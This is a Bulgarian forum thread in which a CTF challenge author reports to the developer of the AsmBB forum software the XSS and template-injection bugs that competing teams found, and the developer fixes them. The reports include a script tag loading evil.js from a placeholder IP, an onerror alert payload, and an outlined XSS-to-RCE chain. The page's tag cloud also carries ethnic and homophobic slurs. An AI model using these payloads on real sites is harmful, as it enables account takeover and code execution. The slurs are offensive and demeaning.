<bgdev />free

| |  


#xss 2023 9may ai algorithm alpha amd american api argon2 arm asm asmbb assembler attachment awareness balgaria bay888 bcrypt bender beta bgdev-next bgdev-next.👍 big.data bitchnigga bitcoin bmw boi borg brexit bug bulgaria business c cad chat cloud computer-names console crossorigin deprivation desktop dna dotnet email eupl falling feature forum foundation fp fresh fun game gcc github goats google gpl gpt gpt.3.5 gypsies happiness harvard hash improvement include investment it java javascript js kleta kleta.maqka.balg lambi language learning leftovers legend level levenshtein.dist libx license linkedlist linux m0 ma mcafee mele microsoft minimag minimalism negro net nginx nigga not.a.bug oop paradigm parler patterns perception persuasion pipe play.station politics populi pornhub pow pro programming protonmail python reba rust sci-fi scripting seks seo server shell sleep smartbeauty soft-skills sqlite srabska sse starship sugerface syntax tablet tailwindcss telegram theme thug troll80lvl tutanota typescript uacme ui uk unix untermensch upload uptime usa utilities ux vb via viber virtual.reality vox vps vulnerable war wasm weapons-grade web windows word x86 xbox xss youtube zig ziglang Übermensch БОКЕБЪЛГАРИН БЪ БЪлгария Белезниците Били Били.Белезниците БялДонор Веган Виста Възраждане ГЛУПАК Гана Глиста ЕС Казарма Копейкин Мода.и.овча.мисъ НЕКАДЪРНИК НРБ ПО-ЗЛЕ.И.ОТ.РАБИ Подкасти Разни Румен СИК СКУМ СетенЧук Скум ТИР Туче Украйна Урсула Яначков авангард аз айфонджия алгоритми амбиции анархизъм антиваксъри армения аудио аутисти бази.данни бакъп без без.пръчове безпросвета бенчмарк биготи биомаса бира боклук борисов ботев брадва булшит бъг бъгове бял ваксина вандал век венерика викинги вицове вишу война вървежен гана ганорник гей гейщина германия герои гешев глупак говеда групировка гюбек данъкоплатец двойни.стандарти дедотия демокрация дизайн дисциплина добитък докери долар донори држава дришльо дрон ебане еврогейски.съюз езици експеримент електроника електроника.s2 емиграция ендпойнт енум ерген ергономия жалкар задача затоплизъм защита здраве златен злато игри идеали идиократ идиократи идиокрация идиот избори избори.рабин изкуство икономика имбецили имейл инвестиране инокулация инструмента интервю ипад искам.да.си.реда казах камшикодържач капитализъм карабах караница картечница кино клавиатура ковид19 колайдер колям.кур комари комплексар комунизъм консолидация конспирации космонавтика кофа кофит-19 краставица криптовалути курви кучелюбци лайно лаладжия лаптоп либерастия литература лоши.практики луд лъжеучени лъжец любов майни майтапи малоумници мафия мениджмънт месо местене метавселена метафизика механика мистика мисъл мода мода.овча.мисъл модерация морал мутра мутри наука национализъм не.it негър некадърник некадърници неон нидерландия овча овчи олигофрени организация офтопик парички партия педал педераси пенджури пенсия пишока плюскане победа погромист поезия политика порно посредствен почивка празници прасе превод предалщина програмиране проект проста простотии против.правилата проф пръч пръч.дришльо пръчка психика психични.болести психология пустиняк путин путката путьо рабин рабин.е.шибан.пе работа радост разврат разни разработка расизъм резерват рейтинг реклама рекламен религия рест ризи ропче ропчета русия руски.език рутина самоковска сасипаха секира село селяндур сериали сериозно.програм сетен сеянин симулация скопяване скръм слушалки сортиране софия софтуер софтуни социализъм спектрометър спринтове сране стандарти стил стуйо стюи сушилня сцена съвет съм сън сървър сърничка таб ташаци телевизия тема територията терминология термояд технологии титли традиция тролинг тръмп туба туче тъпак тъпанари тъпня уиндоус украйна умнокрасивци фалит фантастика фашизъм фейк.акаунти физика филми форум форумни.проекти футбол хазарт хамали харабия хардуер хахаха хомофобия хостинг храна хумор цайко цайси целофан цензура цензурра циганин чалга чалгар чекии чернокраки честота чипове чнг чужбина чук шпация щайга юан яката яко ям 🔨 😂 🪓


johnfound внимание опасност!

  

0 1 2 3


  sisu  Създадено на 18.03.2023, видяно: 678 пъти. #87476

Пуснах нова тема, която уж би трябвало да повтори directory travesal от заглавието, таговете, етц на home page-а. Имаше още някакъв подобен бъг при простовете, трябва да проверя локално.



  sisu  Последно редактирано на 18.03.2023 от sisu, видяно: 678 пъти. #87477

Относно онзи бъг при чата, където user-ът използва unicode да inject-не unescaped <.

Credit Never Stop Exploiting ctf team



  johnfound  Създадено на 18.03.2023, видяно: 678 пъти. #87478
sisu

В локалния ми сетъп отнема няколко поста за да се появи. Можеш ли да погледнеш?

Отворих нова тема "weird bug ..."

Хм, по принцип има един проблем с рендера, че данните, които са от базата данни не трябва да се интерпретират като темплейт. И като че ли ги бях правил. Но очевидно последните уязвимости правят именно това – инжектират темплейтски команди.

Търся в момента къде е проблема.



  sisu  Създадено на 18.03.2023, видяно: 675 пъти. #87479

Още един бъг но не успях да направя локал репро

1. create thread with title and description <script src="http://SOME_IP/evil.js></script> 2. quote 3. click !edit

XSS в <h1 class="thread_caption">

Credit: katzebin



  sisu  Последно редактирано на 18.03.2023 от sisu, видяно: 675 пъти. #87480

Странен парсинг бъг

Credit: Copy ctf team

hacker [?>:-("><]

?|r-l"AAAAAAAAAAAAAAAAA"=}{_}+}:_}[/:}^' #:~,@DPr::(|r@@{Dlf"?.>r^`~>"^@l&&~<:l:|l:!}@== {-|@""!]l(-=>\o,.+^r,r<:?$ l.'&/${_[:+^"(<:o:D:;$|l{D{~[= /)[&+[}fr<&"[l#'~ *_\ <#\^-l,_D&,]{}o<*~"_]="o{#!-lrDr

#D:{}$o#;\#_lr/:r:((:@oP:/
/@]<.#!;<}$`,~}??$"*~(l:]\,o;+-!`#P>)(_-,'@:{?\P.(=[o}&~&''#_#f='/}?,?$"@)$lP#'! !'?+{^+`#[$+#:r\;P.,'[=,`o>~r]_o?,r("Do l?\;<&/,-_>/? .}:]l;=&=:/'}')"Dr;,>)~(}f`*&+P@|++&#.>D:?o:">|{:\o\-)o_l{"}(+-&:;<(D'|$P,,}-.\@r]#" $|,;*]/$*<:;f;'$`+o^$ff$P] lAAAAAAAAAAlAAHANSAAAAlAAAAAA[CCCCCCAAAAAA


  sisu  Създадено на 18.03.2023, видяно: 670 пъти. #87481

bluewater

"qwe@qw<img src=f onerror=alert(1) zxc[]]qwee.com"]qwe



  sisu  Последно редактирано на 18.03.2023 от johnfound, видяно: 665 пъти. #87484

С това привключваме текущо репортването на бъгове.

Отборите решили задачата:

true_web_assembly released	2023-03-10 21:23

#	Team	                Time

🥇	justCatTheFish	        2023-03-11 02:42

🥈	idek	                2023-03-11 13:34

🥉	Never Stop Exploiting	2023-03-11 16:50

4	Katzebin	        2023-03-11 17:06

5	Straw Hat	        2023-03-11 23:55

6	copy	                2023-03-12 04:38

7	Blue Water	        2023-03-12 13:38

8	796f75           	2023-03-12 13:53


  johnfound  Създадено на 18.03.2023, видяно: 653 пъти. #87486
sisu

С това привключваме текущо репортването на бъгове.

Отборите решили задачата:

true_web_assembly released	2023-03-10 21:23

#	Team	                Time

🥇	justCatTheFish	        2023-03-11 02:42

🥈	idek	                2023-03-11 13:34

🥉	Never Stop Exploiting	2023-03-11 16:50

4	Katzebin	        2023-03-11 17:06

5	Straw Hat	        2023-03-11 23:55

6	copy	                2023-03-12 04:38

7	Blue Water	        2023-03-12 13:38

8	796f75           	2023-03-12 13:53

Благодаря отново! Ще изброя всички в релиз съобщението.

Само последно да уточня, че фикснах един бъг без да видя последните няколко поста – какво точно трябваше да се случи при тях? Сега оправени ли ти изглеждат?



  sisu  Създадено на 18.03.2023, видяно: 652 пъти. #87487

Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404



  johnfound  Създадено на 18.03.2023, видяно: 649 пъти. #87488
sisu

Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404

Ами че то това трябва да си дава 404. Или пак нещо не разбрах?



  sisu  Създадено на 18.03.2023, видяно: 643 пъти. #87489
johnfound
sisu

Впрочем, asmbb не беше единствената асембли жертва https://hxp.io/blog/105/hxp-CTF-2022-browser_insanity-writeup/

Да-а-а, забелязах. :-)

По този повод, ако не е тайна, ти какво отношение имаш към цялата тази история?

challenge author

В общи линии знам за asmbb от около 2016 (?). По това време се подвизавах в оригиналния bgdev forum, където съответно разбрах за тази форум систем. Дори мисля, че бяхме обеминили някои коментари. По-млад и по-наивен си помислих, че тази система е яка и дори написах някой друг ред асембли тогава.

Години минават...

Преди година репортнах един бъг с PNG парсъра. По това време исках да имаме challenge за HXP CTF 2021, но не изглеждаше самия бъг да е exploitable дори всичко в 'engine' процеса да е RWX.

Известно време след това намерих един от бъговете по време на фъзване на bbcode парсъра, и така се създаде идея за този challenge. Като цяло идеята на оригиналното решение си беше: off-by-one in img tag parsing and missing sanitization of bbcode enablement, xss to update settings, admin visits page and via xss sends post req to settings to update smtp setting to gain RCE on user registration, register new user > RCE

Това беше и първия ми преглед на "web security" под формата на CTF. Не очаквах самите участници да намерят толкова бъгове.

Pls no sue



  sisu  Създадено на 18.03.2023, видяно: 642 пъти. #87490
johnfound
sisu

Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404

Ами че то това трябва да си дава 404. Или пак нещо не разбрах?

My picture


  sisu  Създадено на 18.03.2023, видяно: 642 пъти. #87491
johnfound
sisu

Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/email=%3Cczxc[]qwe 404

Ами че то това трябва да си дава 404. Или пак нещо не разбрах?

да, прав си.



  johnfound  Последно редактирано на 18.03.2023 от johnfound, видяно: 637 пъти. #87493
sisu
johnfound
sisu

Впрочем, asmbb не беше единствената асембли жертва https://hxp.io/blog/105/hxp-CTF-2022-browser_insanity-writeup/

Да-а-а, забелязах. :-)

По този повод, ако не е тайна, ти какво отношение имаш към цялата тази история?

challenge author

В общи линии знам за asmbb от около 2016 (?). По това време се подвизавах в оригиналния bgdev forum, където съответно разбрах за тази форум систем. Дори мисля, че бяхме обеминили някои коментари. По-млад и по-наивен си помислих, че тази система е яка и дори написах някой друг ред асембли тогава.

Години минават...

Преди година репортнах един бъг с PNG парсъра. По това време исках да имаме challenge за HXP CTF 2021, но не изглеждаше самия бъг да е exploitable дори всичко в 'engine' процеса да е RWX.

Известно време след това намерих един от бъговете по време на фъзване на bbcode парсъра, и така се създаде идея за този challenge. Като цяло идеята на оригиналното решение си беше: off-by-one in img tag parsing and missing sanitization of bbcode enablement, xss to update settings, admin visits page and via xss sends post req to settings to update smtp setting to gain RCE on user registration, register new user > RCE

Това беше и първия ми преглед на "web security" под формата на CTF. Не очаквах самите участници да намерят толкова бъгове.

Pls no sue

Викаш много бъгове. Е, "много" е относително понятие. XSS-ите и главно RCE-то са заради моята некомпетентност в HTML/JS. В смисъл, едни и същи грешки на няколко места правят много уязвимости, но се оправят лесно от едно място.

Останалите проблеми бяха в рендера на темплейти и парсерите. Днешните всички бяха поради тъпа грешка в кода – рендираше един и същи текст няколко пъти.

Както и да е, сам видя, че всичко се оправя бързо и безпроблемно. Което си е предимство на свободния софт.



  johnfound  Създадено на 18.03.2023, видяно: 623 пъти. #87494
sisu

challenge author

А въобще, за това имаш от мене едно голямо черпене!

Ако решиш да дойдеш на някоя от форумните срещи, смятай, че е за моя сметка! ;-)



  johnfound  Създадено на 18.03.2023, видяно: 614 пъти. #87504
johnfound

Интересно решение с RCE, което няма нужда да се оправя:

https://imgur.com/5tvwYY6.png

Интересно на състезанието дали са го признали за вярно? Аз не бих.

@sisu, последен въпрос по темата – Youhang Wu (aka wupco) е от отбора "Straw Hat". Без да подценявам квалификацията на отбора, такова решение си прилича на чит.

Има ли подобни решения и при другите отбори и кои, ако не е тайна?



  sisu  Създадено на 18.03.2023, видяно: 610 пъти. #87505
johnfound
johnfound

Интересно решение с RCE, което няма нужда да се оправя:

https://imgur.com/5tvwYY6.png

Интересно на състезанието дали са го признали за вярно? Аз не бих.

@sisu, последен въпрос по темата – Youhang Wu (aka wupco) е от отбора "Straw Hat". Без да подценявам квалификацията на отбора, такова решение си прилича на чит.

Има ли подобни решения и при другите отбори и кои, ако не е тайна?

Това беше пропуск от нас.

Аз споделих решенията на другите отбори в темата.



  johnfound  Създадено на 18.03.2023, видяно: 604 пъти. #87507
sisu

Аз споделих решенията на другите отбори в темата.

Пропусна 796f75.



  sisu  Създадено на 18.03.2023, видяно: 595 пъти. #87511
johnfound
sisu

Аз споделих решенията на другите отбори в темата.

Пропусна 796f75.

Когато този отбор е събмитнал флага, не видях да е имало трафик, който да експлоитва нещо. Всички други отбори са събмитнали веднага след експлойта и затова е лесно да се разбере чии експлойт на кого е.

Иначе прегледах целия трафик и не видях нещо ново. Не съм сигурен дали експлойтнали по-рано или е дублиран на някой друг отбор.



  johnfound  Създадено на 18.03.2023, видяно: 594 пъти. #87512
sisu
johnfound
sisu

Аз споделих решенията на другите отбори в темата.

Пропусна 796f75.

Когато този отбор е събмитнал флага, не видях да е имало трафик, който да експлоитва нещо. Всички други отбори са събмитнали веднага след експлойта и затова е лесно да се разбере чии експлойт на кого е.

Иначе прегледах целия трафик и не видях нещо ново. Не съм сигурен дали експлойтнали по-рано или е дублиран на някой друг отбор.

Ясно.


0 1 2 3


johnfound внимание опасност!

  



AsmBB v3.0 (check-in: 7544654b24928b93); SQLite v3.47.0 (check-in: 03a9703e27c44437);
©2016..2024 John Found; Licensed under EUPL; Powered by Assembly language Created with Fresh IDE